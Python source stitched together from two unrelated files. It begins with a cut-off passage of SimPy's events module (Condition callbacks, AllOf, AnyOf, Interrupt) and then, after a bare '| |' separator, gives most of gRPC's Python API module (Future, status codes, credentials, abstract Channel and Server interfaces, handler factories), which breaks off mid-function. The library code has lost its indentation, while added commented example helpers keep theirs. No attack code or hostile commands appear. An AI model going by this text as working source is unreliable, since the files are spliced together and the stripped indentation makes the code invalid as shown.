"""Remove _check() callbacks from events recursively.
Once the condition has triggered, the condition's events no longer need
to have _check() callbacks. Removing the _check() callbacks is
important to break circular references between the condition and
untriggered events.
"""
for event in self._events:
if event.callbacks and self._check in event.callbacks:
event.callbacks.remove(self._check)
if isinstance(event, Condition):
event._remove_check_callbacks()
def _check(self, event):
"""Check if the condition was already met and schedule the *event* if
so."""
if self._value is not PENDING:
return
self._count += 1
if not event._ok:
# Abort if the event has failed.
event._defused = True
self.fail(event._value)
elif self._evaluate(self._events, self._count):
# The condition has been met. The _build_value() callback will
# populate the ConditionValue once this condition is processed.
self.succeed()
@staticmethod
def all_events(events, count):
"""An evaluation function that returns ``True`` if all *events* have
been triggered."""
return len(events) == count
@staticmethod
def any_events(events, count):
"""An evaluation function that returns ``True`` if at least one of
*events* has been triggered."""
return count > 0 or len(events) == 0
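# Illustrative sketch (usage, not part of the original module): a custom
# *evaluate* function receiving ``(events, processed_count)`` as described in
# the Condition docstring. The names env, ev1, ev2, ev3 are assumptions.
#
#   def at_least_two(events, count):
#       return count >= 2
#
#   cond = Condition(env, at_least_two, [ev1, ev2, ev3])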
class AllOf(Condition):
"""A :class:`~simpy.events.Condition` event that is triggered if all of
a list of *events* have been successfully triggered. Fails immediately if
any of *events* failed.
"""
def __init__(self, env, events):
super(AllOf, self).__init__(env, Condition.all_events, events)
class AnyOf(Condition):
"""A :class:`~simpy.events.Condition` event that is triggered if any of
a list of *events* has been successfully triggered. Fails immediately if
any of *events* failed.
"""
def __init__(self, env, events):
super(AnyOf, self).__init__(env, Condition.any_events, events)
class Interrupt(Exception):
"""Exception thrown into a process if it is interrupted (see
:func:`~simpy.events.Process.interrupt()`).
:attr:`cause` provides the reason for the interrupt, if any.
If a process is interrupted concurrently, all interrupts will be thrown
into the process in the same order as they occurred.
"""
def __str__(self):
return '%s(%r)' % (self.__class__.__name__, self.cause)
@property
def cause(self):
"""The cause of the interrupt or ``None`` if no cause was provided."""
return self.args[0]
def _describe_frame(frame):
"""Print filename, line number and function name of a stack frame."""
filename, name = frame.f_code.co_filename, frame.f_code.co_name
lineno = frame.f_lineno
with open(filename) as f:
for no, line in enumerate(f):
if no + 1 == lineno:
break
return ' File "%s", line %d, in %s\n %s\n' % (filename, lineno, name,
line.strip())
| |
# Copyright 2015-2016, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""gRPC's Python API."""
import abc
import enum
import six
from grpc._cython import cygrpc as _cygrpc
############################## Future Interface ###############################
class FutureTimeoutError(Exception):
"""Indicates that a method call on a Future timed out."""
class FutureCancelledError(Exception):
"""Indicates that the computation underlying a Future was cancelled."""
class Future(six.with_metaclass(abc.ABCMeta)):
"""A representation of a computation in another control flow.
Computations represented by a Future may be yet to be begun, may be ongoing,
or may have already completed.
"""
@abc.abstractmethod
def cancel(self):
"""Attempts to cancel the computation.
This method does not block.
Returns:
True if the computation has not yet begun, will not be allowed to take
place, and determination of both was possible without blocking. False
under all other circumstances including but not limited to the
computation's already having begun, the computation's already having
finished, and the computation's having been scheduled for execution on a
remote system for which a determination of whether or not it commenced
before being cancelled cannot be made without blocking.
"""
raise NotImplementedError()
@abc.abstractmethod
def cancelled(self):
"""Describes whether the computation was cancelled.
This method does not block.
Returns:
True if the computation was cancelled any time before its result became
immediately available. False under all other circumstances including but
not limited to this object's cancel method not having been called and
the computation's result having become immediately available.
"""
raise NotImplementedError()
@abc.abstractmethod
def running(self):
"""Describes whether the computation is taking place.
This method does not block.
Returns:
True if the computation is scheduled to take place in the future or is
taking place now, or False if the computation took place in the past or
was cancelled.
"""
raise NotImplementedError()
@abc.abstractmethod
def done(self):
"""Describes whether the computation has taken place.
This method does not block.
Returns:
True if the computation is known to have either completed or have been
unscheduled or interrupted. False if the computation may possibly be
executing or scheduled to execute later.
"""
raise NotImplementedError()
@abc.abstractmethod
def result(self, timeout=None):
"""Accesses the outcome of the computation or raises its exception.
This method may return immediately or may block.
Args:
timeout: The length of time in seconds to wait for the computation to
finish or be cancelled, or None if this method should block until the
computation has finished or is cancelled no matter how long that takes.
Returns:
The return value of the computation.
Raises:
FutureTimeoutError: If a timeout value is passed and the computation does
not terminate within the allotted time.
FutureCancelledError: If the computation was cancelled.
Exception: If the computation raised an exception, this call will raise
the same exception.
"""
raise NotImplementedError()
@abc.abstractmethod
def exception(self, timeout=None):
"""Return the exception raised by the computation.
This method may return immediately or may block.
Args:
timeout: The length of time in seconds to wait for the computation to
terminate or be cancelled, or None if this method should block until
the computation is terminated or is cancelled no matter how long that
takes.
Returns:
The exception raised by the computation, or None if the computation did
not raise an exception.
Raises:
FutureTimeoutError: If a timeout value is passed and the computation does
not terminate within the allotted time.
FutureCancelledError: If the computation was cancelled.
"""
raise NotImplementedError()
@abc.abstractmethod
def traceback(self, timeout=None):
"""Access the traceback of the exception raised by the computation.
This method may return immediately or may block.
Args:
timeout: The length of time in seconds to wait for the computation to
terminate or be cancelled, or None if this method should block until
the computation is terminated or is cancelled no matter how long that
takes.
Returns:
The traceback of the exception raised by the computation, or None if the
computation did not raise an exception.
Raises:
FutureTimeoutError: If a timeout value is passed and the computation does
not terminate within the allotted time.
FutureCancelledError: If the computation was cancelled.
"""
raise NotImplementedError()
@abc.abstractmethod
def add_done_callback(self, fn):
"""Adds a function to be called at completion of the computation.
The callback will be passed this Future object describing the outcome of
the computation.
If the computation has already completed, the callback will be called
immediately.
Args:
fn: A callable taking this Future object as its single parameter.
"""
raise NotImplementedError()
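# A hedged consumption sketch for the Future interface above. The
# ``response_future`` argument is hypothetical -- concrete Futures are
# obtained elsewhere (e.g. from a multi-callable's ``future()`` method);
# this only illustrates the done-callback/result protocol.
def _example_consume_future(response_future):
    def _on_done(future):
        # The callback is passed the Future itself once the computation ends.
        if future.cancelled():
            print('computation cancelled')
        elif future.exception() is not None:
            print('computation failed: %s' % future.exception())
        else:
            print('computation succeeded: %s' % future.result())
    response_future.add_done_callback(_on_done)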
################################ gRPC Enums ##################################
@enum.unique
class ChannelConnectivity(enum.Enum):
"""Mirrors grpc_connectivity_state in the gRPC Core.
Attributes:
IDLE: The channel is idle.
CONNECTING: The channel is connecting.
READY: The channel is ready to conduct RPCs.
TRANSIENT_FAILURE: The channel has seen a failure from which it expects to
recover.
SHUTDOWN: The channel has seen a failure from which it cannot recover.
"""
IDLE = (_cygrpc.ConnectivityState.idle, 'idle')
CONNECTING = (_cygrpc.ConnectivityState.connecting, 'connecting')
READY = (_cygrpc.ConnectivityState.ready, 'ready')
TRANSIENT_FAILURE = (
_cygrpc.ConnectivityState.transient_failure, 'transient failure')
SHUTDOWN = (_cygrpc.ConnectivityState.shutdown, 'shutdown')
@enum.unique
class StatusCode(enum.Enum):
"""Mirrors grpc_status_code in the gRPC Core."""
OK = (_cygrpc.StatusCode.ok, 'ok')
CANCELLED = (_cygrpc.StatusCode.cancelled, 'cancelled')
UNKNOWN = (_cygrpc.StatusCode.unknown, 'unknown')
INVALID_ARGUMENT = (
_cygrpc.StatusCode.invalid_argument, 'invalid argument')
DEADLINE_EXCEEDED = (
_cygrpc.StatusCode.deadline_exceeded, 'deadline exceeded')
NOT_FOUND = (_cygrpc.StatusCode.not_found, 'not found')
ALREADY_EXISTS = (_cygrpc.StatusCode.already_exists, 'already exists')
PERMISSION_DENIED = (
_cygrpc.StatusCode.permission_denied, 'permission denied')
RESOURCE_EXHAUSTED = (
_cygrpc.StatusCode.resource_exhausted, 'resource exhausted')
FAILED_PRECONDITION = (
_cygrpc.StatusCode.failed_precondition, 'failed precondition')
ABORTED = (_cygrpc.StatusCode.aborted, 'aborted')
OUT_OF_RANGE = (_cygrpc.StatusCode.out_of_range, 'out of range')
UNIMPLEMENTED = (_cygrpc.StatusCode.unimplemented, 'unimplemented')
INTERNAL = (_cygrpc.StatusCode.internal, 'internal')
UNAVAILABLE = (_cygrpc.StatusCode.unavailable, 'unavailable')
DATA_LOSS = (_cygrpc.StatusCode.data_loss, 'data loss')
UNAUTHENTICATED = (_cygrpc.StatusCode.unauthenticated, 'unauthenticated')
############################# gRPC Exceptions ################################
class RpcError(Exception):
"""Raised by the gRPC library to indicate non-OK-status RPC termination."""
############################## Shared Context ################################
class RpcContext(six.with_metaclass(abc.ABCMeta)):
"""Provides RPC-related information and action."""
@abc.abstractmethod
def is_active(self):
"""Describes whether the RPC is active or has terminated."""
raise NotImplementedError()
@abc.abstractmethod
def time_remaining(self):
"""Describes the length of allowed time remaining for the RPC.
Returns:
A nonnegative float indicating the length of allowed time in seconds
remaining for the RPC to complete before it is considered to have timed
out, or None if no deadline was specified for the RPC.
"""
raise NotImplementedError()
@abc.abstractmethod
def cancel(self):
"""Cancels the RPC.
Idempotent and has no effect if the RPC has already terminated.
"""
raise NotImplementedError()
@abc.abstractmethod
def add_callback(self, callback):
"""Registers a callback to be called on RPC termination.
Args:
callback: A no-parameter callable to be called on RPC termination.
Returns:
True if the callback was added and will be called later; False if the
callback was not added and will not later be called (because the RPC
already terminated or some other reason).
"""
raise NotImplementedError()
######################### Invocation-Side Context ############################
class Call(six.with_metaclass(abc.ABCMeta, RpcContext)):
"""Invocation-side utility object for an RPC."""
@abc.abstractmethod
def initial_metadata(self):
"""Accesses the initial metadata from the service-side of the RPC.
This method blocks until the value is available.
Returns:
The initial :term:`metadata`.
"""
raise NotImplementedError()
@abc.abstractmethod
def trailing_metadata(self):
"""Accesses the trailing metadata from the service-side of the RPC.
This method blocks until the value is available.
Returns:
The trailing :term:`metadata`.
"""
raise NotImplementedError()
@abc.abstractmethod
def code(self):
"""Accesses the status code emitted by the service-side of the RPC.
This method blocks until the value is available.
Returns:
The StatusCode value for the RPC.
"""
raise NotImplementedError()
@abc.abstractmethod
def details(self):
"""Accesses the details value emitted by the service-side of the RPC.
This method blocks until the value is available.
Returns:
The details string of the RPC.
"""
raise NotImplementedError()
############ Authentication & Authorization Interfaces & Classes #############
class ChannelCredentials(object):
"""A value encapsulating the data required to create a secure Channel.
This class has no supported interface - it exists to define the type of its
instances and its instances exist to be passed to other functions.
"""
def __init__(self, credentials):
self._credentials = credentials
class CallCredentials(object):
"""A value encapsulating data asserting an identity over a channel.
A CallCredentials may be composed with ChannelCredentials to always assert
identity for every call over that Channel.
This class has no supported interface - it exists to define the type of its
instances and its instances exist to be passed to other functions.
"""
def __init__(self, credentials):
self._credentials = credentials
class AuthMetadataContext(six.with_metaclass(abc.ABCMeta)):
"""Provides information to call credentials metadata plugins.
Attributes:
service_url: A string URL of the service being called into.
method_name: A string of the fully qualified method name being called.
"""
class AuthMetadataPluginCallback(six.with_metaclass(abc.ABCMeta)):
"""Callback object received by a metadata plugin."""
def __call__(self, metadata, error):
"""Inform the gRPC runtime of the metadata to construct a CallCredentials.
Args:
metadata: The :term:`metadata` used to construct the CallCredentials.
error: An Exception to indicate error or None to indicate success.
"""
raise NotImplementedError()
class AuthMetadataPlugin(six.with_metaclass(abc.ABCMeta)):
"""A specification for custom authentication."""
def __call__(self, context, callback):
"""Implements authentication by passing metadata to a callback.
Implementations of this method must not block.
Args:
context: An AuthMetadataContext providing information on the RPC that the
plugin is being called to authenticate.
callback: An AuthMetadataPluginCallback to be invoked either synchronously
or asynchronously.
"""
raise NotImplementedError()
class ServerCredentials(object):
"""A value encapsulating the data required to open a secure port on a Server.
This class has no supported interface - it exists to define the type of its
instances and its instances exist to be passed to other functions.
"""
def __init__(self, credentials):
self._credentials = credentials
######################## Multi-Callable Interfaces ###########################
class UnaryUnaryMultiCallable(six.with_metaclass(abc.ABCMeta)):
"""Affords invoking a unary-unary RPC."""
@abc.abstractmethod
def __call__(self, request, timeout=None, metadata=None, credentials=None):
"""Synchronously invokes the underlying RPC.
Args:
request: The request value for the RPC.
timeout: An optional duration of time in seconds to allow for the RPC.
metadata: Optional :term:`metadata` to be transmitted to the
service-side of the RPC.
credentials: An optional CallCredentials for the RPC.
Returns:
The response value for the RPC.
Raises:
RpcError: Indicating that the RPC terminated with non-OK status. The
raised RpcError will also be a Call for the RPC affording the RPC's
metadata, status code, and details.
"""
raise NotImplementedError()
@abc.abstractmethod
def with_call(self, request, timeout=None, metadata=None, credentials=None):
"""Synchronously invokes the underlying RPC.
Args:
request: The request value for the RPC.
timeout: An optional duration of time in seconds to allow for the RPC.
metadata: Optional :term:`metadata` to be transmitted to the
service-side of the RPC.
credentials: An optional CallCredentials for the RPC.
Returns:
The response value for the RPC and a Call value for the RPC.
Raises:
RpcError: Indicating that the RPC terminated with non-OK status. The
raised RpcError will also be a Call for the RPC affording the RPC's
metadata, status code, and details.
"""
raise NotImplementedError()
@abc.abstractmethod
def future(self, request, timeout=None, metadata=None, credentials=None):
"""Asynchronously invokes the underlying RPC.
Args:
request: The request value for the RPC.
timeout: An optional duration of time in seconds to allow for the RPC.
metadata: Optional :term:`metadata` to be transmitted to the
service-side of the RPC.
credentials: An optional CallCredentials for the RPC.
Returns:
An object that is both a Call for the RPC and a Future. In the event of
RPC completion, the returned Future's result value will be the response
message of the RPC. Should the RPC terminate with non-OK status, the
returned Future's exception value will be an RpcError.
"""
raise NotImplementedError()
class UnaryStreamMultiCallable(six.with_metaclass(abc.ABCMeta)):
"""Affords invoking a unary-stream RPC."""
@abc.abstractmethod
def __call__(self, request, timeout=None, metadata=None, credentials=None):
"""Invokes the underlying RPC.
Args:
request: The request value for the RPC.
timeout: An optional duration of time in seconds to allow for the RPC.
metadata: An optional :term:`metadata` to be transmitted to the
service-side of the RPC.
credentials: An optional CallCredentials for the RPC.
Returns:
An object that is both a Call for the RPC and an iterator of response
values. Drawing response values from the returned iterator may raise
RpcError indicating termination of the RPC with non-OK status.
"""
raise NotImplementedError()
class StreamUnaryMultiCallable(six.with_metaclass(abc.ABCMeta)):
"""Affords invoking a stream-unary RPC in any call style."""
@abc.abstractmethod
def __call__(
self, request_iterator, timeout=None, metadata=None, credentials=None):
"""Synchronously invokes the underlying RPC.
Args:
request_iterator: An iterator that yields request values for the RPC.
timeout: An optional duration of time in seconds to allow for the RPC.
metadata: Optional :term:`metadata` to be transmitted to the
service-side of the RPC.
credentials: An optional CallCredentials for the RPC.
Returns:
The response value for the RPC.
Raises:
RpcError: Indicating that the RPC terminated with non-OK status. The
raised RpcError will also be a Call for the RPC affording the RPC's
metadata, status code, and details.
"""
raise NotImplementedError()
@abc.abstractmethod
def with_call(
self, request_iterator, timeout=None, metadata=None, credentials=None):
"""Synchronously invokes the underlying RPC.
Args:
request_iterator: An iterator that yields request values for the RPC.
timeout: An optional duration of time in seconds to allow for the RPC.
metadata: Optional :term:`metadata` to be transmitted to the
service-side of the RPC.
credentials: An optional CallCredentials for the RPC.
Returns:
The response value for the RPC and a Call for the RPC.
Raises:
RpcError: Indicating that the RPC terminated with non-OK status. The
raised RpcError will also be a Call for the RPC affording the RPC's
metadata, status code, and details.
"""
raise NotImplementedError()
@abc.abstractmethod
def future(
self, request_iterator, timeout=None, metadata=None, credentials=None):
"""Asynchronously invokes the underlying RPC.
Args:
request_iterator: An iterator that yields request values for the RPC.
timeout: An optional duration of time in seconds to allow for the RPC.
metadata: Optional :term:`metadata` to be transmitted to the
service-side of the RPC.
credentials: An optional CallCredentials for the RPC.
Returns:
An object that is both a Call for the RPC and a Future. In the event of
RPC completion, the returned Future's result value will be the response
message of the RPC. Should the RPC terminate with non-OK status, the
returned Future's exception value will be an RpcError.
"""
raise NotImplementedError()
class StreamStreamMultiCallable(six.with_metaclass(abc.ABCMeta)):
"""Affords invoking a stream-stream RPC in any call style."""
@abc.abstractmethod
def __call__(
self, request_iterator, timeout=None, metadata=None, credentials=None):
"""Invokes the underlying RPC.
Args:
request_iterator: An iterator that yields request values for the RPC.
timeout: An optional duration of time in seconds to allow for the RPC.
metadata: Optional :term:`metadata` to be transmitted to the
service-side of the RPC.
credentials: An optional CallCredentials for the RPC.
Returns:
An object that is both a Call for the RPC and an iterator of response
values. Drawing response values from the returned iterator may raise
RpcError indicating termination of the RPC with non-OK status.
"""
raise NotImplementedError()
############################# Channel Interface ##############################
class Channel(six.with_metaclass(abc.ABCMeta)):
"""Affords RPC invocation via generic methods."""
@abc.abstractmethod
def subscribe(self, callback, try_to_connect=False):
"""Subscribes to this Channel's connectivity.
Args:
callback: A callable to be invoked and passed a ChannelConnectivity value
describing this Channel's connectivity. The callable will be invoked
immediately upon subscription and again for every change to this
Channel's connectivity thereafter until it is unsubscribed or this
Channel object goes out of scope.
try_to_connect: A boolean indicating whether or not this Channel should
attempt to connect if it is not already connected and ready to conduct
RPCs.
"""
raise NotImplementedError()
@abc.abstractmethod
def unsubscribe(self, callback):
"""Unsubscribes a callback from this Channel's connectivity.
Args:
callback: A callable previously registered with this Channel by having
been passed to its "subscribe" method.
"""
raise NotImplementedError()
@abc.abstractmethod
def unary_unary(
self, method, request_serializer=None, response_deserializer=None):
"""Creates a UnaryUnaryMultiCallable for a unary-unary method.
Args:
method: The name of the RPC method.
Returns:
A UnaryUnaryMultiCallable value for the named unary-unary method.
"""
raise NotImplementedError()
@abc.abstractmethod
def unary_stream(
self, method, request_serializer=None, response_deserializer=None):
"""Creates a UnaryStreamMultiCallable for a unary-stream method.
Args:
method: The name of the RPC method.
Returns:
A UnaryStreamMultiCallable value for the named unary-stream method.
"""
raise NotImplementedError()
@abc.abstractmethod
def stream_unary(
self, method, request_serializer=None, response_deserializer=None):
"""Creates a StreamUnaryMultiCallable for a stream-unary method.
Args:
method: The name of the RPC method.
Returns:
A StreamUnaryMultiCallable value for the named stream-unary method.
"""
raise NotImplementedError()
@abc.abstractmethod
def stream_stream(
self, method, request_serializer=None, response_deserializer=None):
"""Creates a StreamStreamMultiCallable for a stream-stream method.
Args:
method: The name of the RPC method.
Returns:
A StreamStreamMultiCallable value for the named stream-stream method.
"""
raise NotImplementedError()
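# A hedged sketch of invoking an RPC through the Channel interface above.
# The method path is a hypothetical placeholder; with the serializers left
# as None, raw bytes are transmitted as-is. Real callers typically use
# generated protobuf stubs instead.
def _example_invoke_unary_unary(channel):
    multi_callable = channel.unary_unary('/example.Service/UnaryMethod')
    # Blocking call style; raises RpcError on non-OK termination:
    response = multi_callable(b'request-bytes', timeout=5)
    # Future call style; the returned object is both a Call and a Future:
    response_future = multi_callable.future(b'request-bytes', timeout=5)
    return response, response_future.result()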
########################## Service-Side Context ##############################
class ServicerContext(six.with_metaclass(abc.ABCMeta, RpcContext)):
"""A context object passed to method implementations."""
@abc.abstractmethod
def invocation_metadata(self):
"""Accesses the metadata from the invocation-side of the RPC.
Returns:
The invocation :term:`metadata`.
"""
raise NotImplementedError()
@abc.abstractmethod
def peer(self):
"""Identifies the peer that invoked the RPC being serviced.
Returns:
A string identifying the peer that invoked the RPC being serviced.
"""
raise NotImplementedError()
@abc.abstractmethod
def send_initial_metadata(self, initial_metadata):
"""Sends the initial metadata value to the invocation-side of the RPC.
This method need not be called by method implementations if they have no
service-side initial metadata to transmit.
Args:
initial_metadata: The initial :term:`metadata`.
"""
raise NotImplementedError()
@abc.abstractmethod
def set_trailing_metadata(self, trailing_metadata):
"""Accepts the trailing metadata value of the RPC.
This method need not be called by method implementations if they have no
service-side trailing metadata to transmit.
Args:
trailing_metadata: The trailing :term:`metadata`.
"""
raise NotImplementedError()
@abc.abstractmethod
def set_code(self, code):
"""Accepts the status code of the RPC.
This method need not be called by method implementations if they wish the
gRPC runtime to determine the status code of the RPC.
Args:
code: The StatusCode value of the RPC to be transmitted to the
invocation side of the RPC.
"""
raise NotImplementedError()
@abc.abstractmethod
def set_details(self, details):
"""Accepts the service-side details of the RPC.
This method need not be called by method implementations if they have no
details to transmit.
Args:
details: The details string of the RPC to be transmitted to
the invocation side of the RPC.
"""
raise NotImplementedError()
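# A hedged sketch of a unary-unary method implementation using the
# ServicerContext above to report a non-OK status; the emptiness check and
# echo behavior are hypothetical placeholders.
def _example_unary_unary_behavior(request, servicer_context):
    if not request:
        servicer_context.set_code(StatusCode.INVALID_ARGUMENT)
        servicer_context.set_details('empty request')
        return b''
    return request  # echo the request back unchanged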
##################### Service-Side Handler Interfaces ########################
class RpcMethodHandler(six.with_metaclass(abc.ABCMeta)):
"""An implementation of a single RPC method.
Attributes:
request_streaming: Whether the RPC supports exactly one request message or
any arbitrary number of request messages.
response_streaming: Whether the RPC supports exactly one response message or
any arbitrary number of response messages.
request_deserializer: A callable behavior that accepts a byte string and
returns an object suitable to be passed to this object's business logic,
or None to indicate that this object's business logic should be passed the
raw request bytes.
response_serializer: A callable behavior that accepts an object produced by
this object's business logic and returns a byte string, or None to
indicate that the byte strings produced by this object's business logic
should be transmitted on the wire as they are.
unary_unary: This object's application-specific business logic as a callable
value that takes a request value and a ServicerContext object and returns
a response value. Only non-None if both request_streaming and
response_streaming are False.
unary_stream: This object's application-specific business logic as a
callable value that takes a request value and a ServicerContext object and
returns an iterator of response values. Only non-None if request_streaming
is False and response_streaming is True.
stream_unary: This object's application-specific business logic as a
callable value that takes an iterator of request values and a
ServicerContext object and returns a response value. Only non-None if
request_streaming is True and response_streaming is False.
stream_stream: This object's application-specific business logic as a
callable value that takes an iterator of request values and a
ServicerContext object and returns an iterator of response values. Only
non-None if request_streaming and response_streaming are both True.
"""
class HandlerCallDetails(six.with_metaclass(abc.ABCMeta)):
"""Describes an RPC that has just arrived for service.
Attributes:
method: The method name of the RPC.
invocation_metadata: The :term:`metadata` from the invocation side of the RPC.
"""
class GenericRpcHandler(six.with_metaclass(abc.ABCMeta)):
"""An implementation of arbitrarily many RPC methods."""
@abc.abstractmethod
def service(self, handler_call_details):
"""Services an RPC (or not).
Args:
handler_call_details: A HandlerCallDetails describing the RPC.
Returns:
An RpcMethodHandler with which the RPC may be serviced, or None to
indicate that this object will not be servicing the RPC.
"""
raise NotImplementedError()
############################# Server Interface ###############################
class Server(six.with_metaclass(abc.ABCMeta)):
"""Services RPCs."""
@abc.abstractmethod
def add_generic_rpc_handlers(self, generic_rpc_handlers):
"""Registers GenericRpcHandlers with this Server.
This method is only safe to call before the server is started.
Args:
generic_rpc_handlers: An iterable of GenericRpcHandlers that will be used
to service RPCs after this Server is started.
"""
raise NotImplementedError()
@abc.abstractmethod
def add_insecure_port(self, address):
"""Reserves a port for insecure RPC service once this Server becomes active.
This method may only be called before this Server's start method is called.
Args:
address: The address for which to open a port.
Returns:
An integer port on which RPCs will be serviced after this Server has been
started. This is typically the same number as the port number contained
in the passed address, but will likely be different if the port number
contained in the passed address was zero.
"""
raise NotImplementedError()
@abc.abstractmethod
def add_secure_port(self, address, server_credentials):
"""Reserves a port for secure RPC service after this Server becomes active.
This method may only be called before this Server's start method is called.
Args:
address: The address for which to open a port.
server_credentials: A ServerCredentials.
Returns:
An integer port on which RPCs will be serviced after this Server has been
started. This is typically the same number as the port number contained
in the passed address, but will likely be different if the port number
contained in the passed address was zero.
"""
raise NotImplementedError()
@abc.abstractmethod
def start(self):
"""Starts this Server's service of RPCs.
This method may only be called while the server is not serving RPCs (i.e. it
is not idempotent).
"""
raise NotImplementedError()
@abc.abstractmethod
def stop(self, grace):
"""Stops this Server's service of RPCs.
All calls to this method immediately stop service of new RPCs. When existing
RPCs are aborted is controlled by the grace period parameter passed to this
method.
This method may be called at any time and is idempotent. Passing a smaller
grace value than has been passed in a previous call will have the effect of
stopping the Server sooner. Passing a larger grace value than has been
passed in a previous call will not have the effect of stopping the server
later.
Args:
grace: A duration of time in seconds to allow existing RPCs to complete
before being aborted by this Server's stopping. If None, this method
will block until the server is completely stopped.
Returns:
A threading.Event that will be set when this Server has completely
stopped. The returned event may not be set until after the full grace
period (if some ongoing RPC continues for the full length of the period)
or it may be set much sooner (such as if this Server had no RPCs underway
at the time it was stopped or if all RPCs that it had underway completed
very early in the grace period).
"""
raise NotImplementedError()
################################# Functions ################################
def unary_unary_rpc_method_handler(
behavior, request_deserializer=None, response_serializer=None):
"""Creates an RpcMethodHandler for a unary-unary RPC method.
Args:
behavior: The implementation of an RPC method as a callable behavior taking
a single request value and returning a single response value.
request_deserializer: An optional request deserialization behavior.
response_serializer: An optional response serialization behavior.
Returns:
An RpcMethodHandler for a unary-unary RPC method constructed from the given
parameters.
"""
from grpc import _utilities
return _utilities.RpcMethodHandler(
False, False, request_deserializer, response_serializer, behavior, None,
None, None)
def unary_stream_rpc_method_handler(
behavior, request_deserializer=None, response_serializer=None):
"""Creates an RpcMethodHandler for a unary-stream RPC method.
Args:
behavior: The implementation of an RPC method as a callable behavior taking
a single request value and returning an iterator of response values.
request_deserializer: An optional request deserialization behavior.
response_serializer: An optional response serialization behavior.
Returns:
An RpcMethodHandler for a unary-stream RPC method constructed from the
given parameters.
"""
from grpc import _utilities
return _utilities.RpcMethodHandler(
False, True, request_deserializer, response_serializer, None, behavior,
None, None)
def stream_unary_rpc_method_handler(
behavior, request_deserializer=None, response_serializer=None):
"""Creates an RpcMethodHandler for a stream-unary RPC method.
Args:
behavior: The implementation of an RPC method as a callable behavior taking
an iterator of request values and returning a single response value.
request_deserializer: An optional request deserialization behavior.
response_serializer: An optional response serialization behavior.
Returns:
An RpcMethodHandler for a stream-unary RPC method constructed from the
given parameters.
"""
from grpc import _utilities
return _utilities.RpcMethodHandler(
True, False, request_deserializer, response_serializer, None, None,
behavior, None)
def stream_stream_rpc_method_handler(
behavior, request_deserializer=None, response_serializer=None):
"""Creates an RpcMethodHandler for a stream-stream RPC method.
Args:
behavior: The implementation of an RPC method as a callable behavior taking
an iterator of request values and returning an iterator of response
values.
request_deserializer: An optional request deserialization behavior.
response_serializer: An optional response serialization behavior.
Returns:
An RpcMethodHandler for a stream-stream RPC method constructed from the
given parameters.
"""
from grpc import _utilities
return _utilities.RpcMethodHandler(
True, True, request_deserializer, response_serializer, None, None, None,
behavior)
def method_handlers_generic_handler(service, method_handlers):
"""Creates a grpc.GenericRpcHandler from RpcMethodHandlers.
Args:
service: A service name to be used for the given method handlers.
method_handlers: A dictionary from method name to RpcMethodHandler
implementing the named method.
Returns:
A GenericRpcHandler constructed from the given parameters.
"""
from grpc import _utilities
return _utilities.DictionaryGenericHandler(service, method_handlers)
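# A hedged end-to-end sketch wiring the helpers above into a
# GenericRpcHandler; the service name, method name, and echo behavior are
# hypothetical placeholders.
def _example_generic_handler():
    def echo(request, servicer_context):
        return request
    method_handlers = {'Echo': unary_unary_rpc_method_handler(echo)}
    return method_handlers_generic_handler(
        'example.EchoService', method_handlers)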
def ssl_channel_credentials(
root_certificates=None, private_key=None, certificate_chain=None):
"""Creates a ChannelCredentials for use with an SSL-enabled Channel.
Args:
root_certificates: The PEM-encoded root certificates or unset to ask for
them to be retrieved from a default location.
private_key: The PEM-encoded private key to use or unset if no private key
should be used.
certificate_chain: The PEM-encoded certificate chain to use or unset if no
certificate chain should be used.
Returns:
A ChannelCredentials for use with an SSL-enabled Channel.
"""
if private_key is not None or certificate_chain is not None:
pair = _cygrpc.SslPemKeyCertPair(private_key, certificate_chain)
else:
pair = None
return ChannelCredentials(
_cygrpc.channel_credentials_ssl(root_certificates, pair))
def metadata_call_credentials(metadata_plugin, name=None):
"""Construct CallCredentials from an AuthMetadataPlugin.
Args:
metadata_plugin: An AuthMetadataPlugin to use as the authentication behavior
in the created CallCredentials.
name: A name for the plugin.
Returns:
A CallCredentials.
"""
from grpc import _plugin_wrapping
if name is None:
try:
effective_name = metadata_plugin.__name__
except AttributeError:
effective_name = metadata_plugin.__class__.__name__
else:
effective_name = name
return CallCredentials(
_plugin_wrapping.call_credentials_metadata_plugin(
metadata_plugin, effective_name))
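# A hedged sketch of a custom AuthMetadataPlugin for use with
# metadata_call_credentials; the header name and token value are
# hypothetical placeholders.
class _ExampleStaticAuthPlugin(AuthMetadataPlugin):
    """Supplies a fixed authorization header for every call."""

    def __call__(self, context, callback):
        # Must not block: hand the metadata to the callback immediately.
        callback((('authorization', 'Bearer example-token'),), None)

# Usage sketch: metadata_call_credentials(_ExampleStaticAuthPlugin(),
#                                         name='static-auth')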
def access_token_call_credentials(access_token):
"""Construct CallCredentials from an access token.
Args:
access_token: A string to place directly in the http request
authorization header, i.e. "authorization: Bearer <access_token>".
Returns:
A CallCredentials.
"""
from grpc import _auth
return metadata_call_credentials(
_auth.AccessTokenCallCredentials(access_token))
def composite_call_credentials(*call_credentials):
"""Compose multiple CallCredentials to make a new CallCredentials.
Args:
*call_credentials: At least two CallCredentials objects.
Returns:
A CallCredentials object composed of the given CallCredentials objects.
"""
